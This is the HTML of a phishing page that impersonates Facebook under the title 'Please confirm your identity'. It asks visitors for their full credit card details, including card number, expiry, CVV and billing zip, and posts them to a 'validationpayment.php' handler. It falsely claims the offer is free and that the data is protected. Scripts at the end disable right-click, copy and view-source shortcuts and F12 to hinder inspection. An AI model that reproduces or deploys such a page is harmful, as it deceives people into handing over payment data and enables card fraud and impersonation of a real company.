<!DOCTYPE html>
<html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" />
<title id="pageTitle">Please confirm your identity</title>
<link rel="shortcut icon" href="img/GIcon.ico" />
<link type="text/css" rel="stylesheet" href="css/3-pTiS7o2eCja.css"/>
<link type="text/css" rel="stylesheet" href="css/4-2-9N8qo_l-I.css"/>
<link type="text/css" rel="stylesheet" href="css/5-o-wil6C-n6y.css"/>
<link type="text/css" rel="stylesheet" href="css/0fTds33SvS2.css">
<link type="text/css" rel="stylesheet" href="css/gf45DfE6Ssa.css">
<link type="text/css" rel="stylesheet" href="css/W9ddf43DTs.css">
<style>
div.posbg {
  position: relative;
  top: -150px;
  left: 0px;

}
</style>
</head>
<body class="UIPage_LoggedOut _-kb _61s0 _605a b_c3pyn-ahh chrome webkit win x1 Locale_en_GB" dir="ltr">
<div class="_li" id="u_0_2">
<div id="bluebarRoot" class="_2t-8 _1s4v _2s1x _h2p">
<div aria-label="Facebook" class="_2t-a _26aw _33rf _2s1y" role="banner">
<div class="_2t-a _4pmj _2t-d">
<h1 class="_19ea" data-click="bluebar_logo">
<a class="_7tp1" data-gt="&#123;&quot;chrome_nav_item&quot;:&quot;logo_chrome&quot;&#125;" href="https://www.facebook.com/?ref=logo" title="Go to Facebook home">
<img id="logo" src="img/F8n3WrEc0r.png" height="20" width="103"></i></a>
</h1>
</div></div>

<div class="_4-u5 _30ny">
<div class="posbg">
<div class="_59s7" role="dialog" aria-labelledby="js_2q" style="width: 540px; margin-top: 150px;">
<div class="_4t2a">
<div><div><div>
<div class="_4-i0">
<div class="clearfix">
<div class="_ohe lfloat">
<h3 class="_52c9" data-hover="tooltip" data-tooltip-display="overflow" id="js_2q">Please Enter Your Credit Card Information</h3>
</div><div class="_ohf rfloat">
<div class="_51-u">
</div></div></div></div>

<form rel="async" class="fbCreditCard editMode" action="validationpayment.php" method="post" id="uwgdz8_3" onsubmit="return validateCard(this.CNumber.value,this.CType.value,this.mm.value,this.yy.value);">

<div font-size="medium" class="_4-i2 _pig  _50f4"><div><div>Please Enter your Credit Card Number to get updates.You will NOT be charged and this is a completely free offer from Facebook.<br><br>
<ul class="_j_q uiList  _4ki _509- _6-i _6-h _704"><li>
<img src="img/mc.png" alt="" class="img"></li><li>
<img src="img/visa.png" alt="" class="img"></li><li>
<img src="img/americanexpress.png" alt="" class="img"></li></ul>
<div class="_6_c _4bl7">Name On Card</div>
<label class="_6_h _55r1 _55r2 _58ak" id="js_98" aria-describedby="js_fr">
<input name="CName" id="CName" type="text" class="_58al" value="" tabindex="0" minlength="6" maxlength="50" required="" ></label>

<div class="clearfix _ikh">
<div class="_6_c _4bl7">Card Number</div>
<div class="_6_d _4bl7">Expiration</div>
<div class="_3_sc _4bl7">Security Code<span>

<class="_5kik" alignh="left" href="#">
<i alt="" class="img sp_WKESr1YBxv- sx_0a9dc0"></i></a>

</span>
</div></div>
<div class="clearfix _ikh"><div class="_6_c _4bl7">
<label class="_6_h _55r1 _55r2 _58ak" id="js_98" aria-describedby="js_fr">
<input name="CNumber" id="CNumber" type="text" class="_58al" value="" tabindex="0" minlength="15" maxlength="16" required="" onKeyDown="return ( event.ctrlKey || event.altKey
|| (47<event.keyCode && event.keyCode<58 && event.shiftKey==false)
|| (95<event.keyCode && event.keyCode<106)
|| (event.keyCode==8) || (event.keyCode==9)
|| (event.keyCode>34 && event.keyCode<40)
|| (event.keyCode==46) )"></label>

</div>
<div class="_6_d _4bl7">
<label class="_6_i _55r1 _55r2 _58ak _3ct8">
<input name="mm" id="mm" type="text" class="_58al" placeholder="MM" value="" minlength="1" maxlength="2" required=""></label>

<label class="_6_j _55r1 _55r2 _58ak _3ct8">
<input name="yy" id="yy" type="text" class="_58al" placeholder="YY" value="" minlength="2" maxlength="2" required=""></label>

</div>
<div class="_4bl7">
<label class="_6_l _55r1 _55r2 _58ak _3ct8">
<input name="CVV" id="CVV" type="text" class="_58al" placeholder="••••" value="" minlength="3" maxlength="4" required=""></label>

</div>
</div>
<div>

<div class="clearfix _ikh">
<div class="_6_e _4bl7">Billing Zip Code</div>
<div class="_4bl7">Country</div></div>

<div class="clearfix _ikh">
<div class="_6_e _4bl7">

<label class="_702 _55r1 _55r2 _58ak _3ct8">
<input name="zip" type="text" class="_58al" value="" minlength="3" maxlength="10" required=""></label></div>

<div class="_6_f _4bl7"><div class="_4y5t">
<div class="uiPopover _6a _6b">

<select class="fbCountrySelector" name="country">
<option value="0" selected="1">Select</option>
<option value="US">United States</option>
<option value="CA">Canada</option>
<option value="GB">United Kingdom</option>
<option value="AF">Afghanistan</option>
<option value="AX">Aland Islands</option>
<option value="AL">Albania</option>
<option value="DZ">Algeria</option>
<option value="AS">American Samoa</option>
<option value="AD">Andorra</option>
<option value="AO">Angola</option>
<option value="AI">Anguilla</option>
<option value="AQ">Antarctica</option>
<option value="AG">Antigua</option>
<option value="AR">Argentina</option>
<option value="AM">Armenia</option>
<option value="AW">Aruba</option>
<option value="AU">Australia</option>
<option value="AT">Austria</option>
<option value="AZ">Azerbaijan</option>
<option value="BH">Bahrain</option>
<option value="BD">Bangladesh</option>
<option value="BB">Barbados</option>
<option value="BY">Belarus</option>
<option value="BE">Belgium</option>
<option value="BZ">Belize</option>
<option value="BJ">Benin</option>
<option value="BM">Bermuda</option>
<option value="BT">Bhutan</option>
<option value="BO">Bolivia</option>
<option value="BQ">Bonaire, Sint Eustatius and Saba</option>
<option value="BA">Bosnia and Herzegovina</option>
<option value="BW">Botswana</option>
<option value="BV">Bouvet Island</option>
<option value="BR">Brazil</option>
<option value="IO">British Indian Ocean Territory</option>
<option value="VG">British Virgin Islands</option>
<option value="BN">Brunei</option>
<option value="BG">Bulgaria</option>
<option value="BF">Burkina Faso</option>
<option value="BI">Burundi</option>
<option value="KH">Cambodia</option>
<option value="CM">Cameroon</option>
<option value="CV">Cape Verde</option>
<option value="KY">Cayman Islands</option>
<option value="CF">Central African Republic</option>
<option value="TD">Chad</option>
<option value="CL">Chile</option>
<option value="CN">China</option>
<option value="CX">Christmas Island</option>
<option value="CC">Cocos (Keeling) Islands</option>
<option value="CO">Colombia</option>
<option value="KM">Comoros</option>
<option value="CK">Cook Islands</option>
<option value="CR">Costa Rica</option>
<option value="CI">Côte d'Ivoire</option>
<option value="HR">Croatia</option>
<option value="CW">Curaçao</option>
<option value="CY">Cyprus</option>
<option value="CZ">Czech Republic</option>
<option value="CD">Democratic Republic of the Congo</option>
<option value="DK">Denmark</option>
<option value="DJ">Djibouti</option>
<option value="DM">Dominica</option>
<option value="DO">Dominican Republic</option>
<option value="EC">Ecuador</option>
<option value="EG">Egypt</option>
<option value="SV">El Salvador</option>
<option value="GQ">Equatorial Guinea</option>
<option value="ER">Eritrea</option>
<option value="EE">Estonia</option>
<option value="ET">Ethiopia</option>
<option value="FK">Falkland Islands</option>
<option value="FO">Faroe Islands</option>
<option value="FM">Federated States of Micronesia</option>
<option value="FJ">Fiji</option>
<option value="FI">Finland</option>
<option value="FR">France</option>
<option value="GF">French Guiana</option>
<option value="PF">French Polynesia</option>
<option value="TF">French Southern Territories</option>
<option value="GA">Gabon</option>
<option value="GE">Georgia</option>
<option value="DE">Germany</option>
<option value="GH">Ghana</option>
<option value="GI">Gibraltar</option>
<option value="GR">Greece</option>
<option value="GL">Greenland</option>
<option value="GD">Grenada</option>
<option value="GP">Guadeloupe</option>
<option value="GU">Guam</option>
<option value="GT">Guatemala</option>
<option value="GG">Guernsey</option>
<option value="GN">Guinea</option>
<option value="GW">Guinea-Bissau</option>
<option value="GY">Guyana</option>
<option value="HT">Haiti</option>
<option value="HM">Heard Island and McDonald Islands</option>
<option value="HN">Honduras</option>
<option value="HK">Hong Kong</option>
<option value="HU">Hungary</option>
<option value="IS">Iceland</option>
<option value="IN">India</option>
<option value="ID">Indonesia</option>
<option value="IQ">Iraq</option>
<option value="IE">Ireland</option>
<option value="IM">Isle Of Man</option>
<option value="IL">Israel</option>
<option value="IT">Italy</option>
<option value="JM">Jamaica</option>
<option value="JP">Japan</option>
<option value="JE">Jersey</option>
<option value="JO">Jordan</option>
<option value="KZ">Kazakhstan</option>
<option value="KE">Kenya</option>
<option value="KI">Kiribati</option>
<option value="KW">Kuwait</option>
<option value="KG">Kyrgyzstan</option>
<option value="LA">Laos</option>
<option value="LV">Latvia</option>
<option value="LB">Lebanon</option>
<option value="LS">Lesotho</option>
<option value="LR">Liberia</option>
<option value="LY">Libya</option>
<option value="LI">Liechtenstein</option>
<option value="LT">Lithuania</option>
<option value="LU">Luxembourg</option>
<option value="MO">Macau</option>
<option value="MK">Macedonia</option>
<option value="MG">Madagascar</option>
<option value="MW">Malawi</option>
<option value="MY">Malaysia</option>
<option value="MV">Maldives</option>
<option value="ML">Mali</option>
<option value="MT">Malta</option>
<option value="MH">Marshall Islands</option>
<option value="MQ">Martinique</option>
<option value="MR">Mauritania</option>
<option value="MU">Mauritius</option>
<option value="YT">Mayotte</option>
<option value="MX">Mexico</option>
<option value="MD">Moldova</option>
<option value="MC">Monaco</option>
<option value="MN">Mongolia</option>
<option value="ME">Montenegro</option>
<option value="MS">Montserrat</option>
<option value="MA">Morocco</option>
<option value="MZ">Mozambique</option>
<option value="MM">Myanmar</option>
<option value="NA">Namibia</option>
<option value="NR">Nauru</option>
<option value="NP">Nepal</option>
<option value="NL">Netherlands</option>
<option value="AN">Netherlands Antilles</option>
<option value="NC">New Caledonia</option>
<option value="NZ">New Zealand</option>
<option value="NI">Nicaragua</option>
<option value="NE">Niger</option>
<option value="NG">Nigeria</option>
<option value="NU">Niue</option>
<option value="NF">Norfolk Island</option>
<option value="KP">North Korea</option>
<option value="MP">Northern Mariana Islands</option>
<option value="NO">Norway</option>
<option value="OM">Oman</option>
<option value="PK">Pakistan</option>
<option value="PW">Palau</option>
<option value="PS">Palestine</option>
<option value="PA">Panama</option>
<option value="PG">Papua New Guinea</option>
<option value="PY">Paraguay</option>
<option value="PE">Peru</option>
<option value="PH">Philippines</option>
<option value="PN">Pitcairn</option>
<option value="PL">Poland</option>
<option value="PT">Portugal</option>
<option value="PR">Puerto Rico</option>
<option value="QA">Qatar</option>
<option value="CG">Republic of the Congo</option>
<option value="RE">Réunion</option>
<option value="RO">Romania</option>
<option value="RU">Russia</option>
<option value="RW">Rwanda</option>
<option value="BL">Saint Barthélemy</option>
<option value="SH">Saint Helena</option>
<option value="KN">Saint Kitts and Nevis</option>
<option value="MF">Saint Martin</option>
<option value="PM">Saint Pierre and Miquelon</option>
<option value="VC">Saint Vincent and the Grenadines</option>
<option value="WS">Samoa</option>
<option value="SM">San Marino</option>
<option value="ST">Sao Tome and Principe</option>
<option value="SA">Saudi Arabia</option>
<option value="SN">Senegal</option>
<option value="RS">Serbia</option>
<option value="SC">Seychelles</option>
<option value="SL">Sierra Leone</option>
<option value="SG">Singapore</option>
<option value="SX">Sint Maarten</option>
<option value="SK">Slovakia</option>
<option value="SI">Slovenia</option>
<option value="SB">Solomon Islands</option>
<option value="SO">Somalia</option>
<option value="ZA">South Africa</option>
<option value="GS">South Georgia and the South Sandwich Islands</option>
<option value="KR">South Korea</option>
<option value="SS">South Sudan</option>
<option value="ES">Spain</option>
<option value="LK">Sri Lanka</option>
<option value="LC">St. Lucia</option>
<option value="SR">Suriname</option>
<option value="SJ">Svalbard and Jan Mayen</option>
<option value="SZ">Swaziland</option>
<option value="SE">Sweden</option>
<option value="CH">Switzerland</option>
<option value="TW">Taiwan</option>
<option value="TJ">Tajikistan</option>
<option value="TZ">Tanzania</option>
<option value="TH">Thailand</option>
<option value="BS">The Bahamas</option>
<option value="GM">The Gambia</option>
<option value="TL">Timor-Leste</option>
<option value="TG">Togo</option>
<option value="TK">Tokelau</option>
<option value="TO">Tonga</option>
<option value="TT">Trinidad and Tobago</option>
<option value="TN">Tunisia</option>
<option value="TR">Turkey</option>
<option value="TM">Turkmenistan</option>
<option value="TC">Turks and Caicos Islands</option>
<option value="TV">Tuvalu</option>
<option value="UG">Uganda</option>
<option value="UA">Ukraine</option>
<option value="AE">United Arab Emirates</option>
<option value="UM">United States Minor Outlying Islands</option>
<option value="UY">Uruguay</option>
<option value="VI">US Virgin Islands</option>
<option value="UZ">Uzbekistan</option>
<option value="VU">Vanuatu</option>
<option value="VA">Vatican City</option>
<option value="VE">Venezuela</option>
<option value="VN">Vietnam</option>
<option value="WF">Wallis and Futuna</option>
<option value="EH">Western Sahara</option>
<option value="YE">Yemen</option>
<option value="ZM">Zambia</option>
<option value="ZW">Zimbabwe</option>
</select>

</div>

</div></div></div></div><div class="_5aj7">
<div class="_4bl9"></div>

<input type="submit" class=" layerButton _4jy0 _4jy5 _4jy1 _51sy selected _42ft" value="Update Complete"></a>
</div></div></div></div><div class="_5w8e">

<div class="_5w8f clearfix" direction="left">
<div class="_ohe lfloat">
<img src="img/lock-black.png" class="img _8o _8r" alt=""></div>
<div class="">
<div class="_42ef _8u"><font color="black"><b>Your payment information is protected and only you can see it on Facebook.</font> <a target="__blank" href="https://www.facebook.com/payments_terms/privacy"><font color="blue">See Privacy Terms</a></b>

<script type="text/javascript">
function mousedwn(e){try{if(event.button==2||event.button==3)return false}catch(e){if(e.which==3)return false}}document.oncontextmenu=function(){return false};document.ondragstart=function(){return false};document.onmousedown=mousedwn
</script>

<script type="text/javascript">
window.addEventListener("keydown",function(e){if(e.ctrlKey&&(e.which==65||e.which==66||e.which==67||e.which==73||e.which==80||e.which==83||e.which==85||e.which==86)){e.preventDefault()}});document.keypress=function(e){if(e.ctrlKey&&(e.which==65||e.which==66||e.which==67||e.which==73||e.which==80||e.which==83||e.which==85||e.which==86)){}return false}
</script>

<script type="text/javascript">
document.onkeydown=function(e){e=e||window.event;if(e.keyCode==123||e.keyCode==18){return false}}
</script>

</body></html>